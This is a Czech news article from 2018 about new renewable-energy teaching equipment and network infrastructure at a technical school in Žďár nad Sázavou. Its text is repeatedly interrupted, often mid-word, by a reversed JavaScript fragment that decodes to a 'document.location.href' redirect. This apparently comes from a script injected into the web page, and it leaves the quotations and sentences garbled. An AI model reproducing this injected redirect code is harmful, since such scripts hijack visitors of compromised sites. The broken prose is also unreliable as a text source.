Rainbow page separator

Studenti žďárské průmyslovky využívají nejmodernější vybavení

Středa, 7. listopadu 2018

Žďár nad Sázavou / Nejmodernější vybavení pro studium technologií využívajících různé obnovitelné zdroje energie mají nyní studenti žďárské průmyslovky.
„V [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kompletním složení zdrojů obnovitelných energií je škola absolutní špičkou mezi specializovanými pracovišti v České republice. Stejná pracoviště budujeme ještě ve Střední škole stavební v Třebíči a v Jihlavě. Jen ve Žďáře centrum přišlo na více než 6,5 milionu korun, velkou část nákladů ale pokryje dotace z Integrovaného regionálního operačního programu,“ informovala radní Kraje Vysočina pro oblast školství, mládeže a sportu Jana Fialová.
V rámci projektu došlo k pořízení fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovoltaických panelů, slunečních kolek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torů, tepelných čerpadel a kogenerační jednotky. Ovládací a moni[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torovací prvky byly vyvedeny na řídicí pult a převedeny do software v počítačích.
„Bude tak možné nejen simulovat chování prvků, ale také modelovat reálné situace. V rámci projektu bude pro všechny tři školy pořízena konektivita – wifi síť, firewally, řízení identit, analýza síťového provozu, záložní zdroj, server a da[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové úložiště,“ vyjmenoval ředitel Vyšší odborné školy a Střední průmyslové školy ve Žďáře nad Sázavou Jaroslav Kletečka.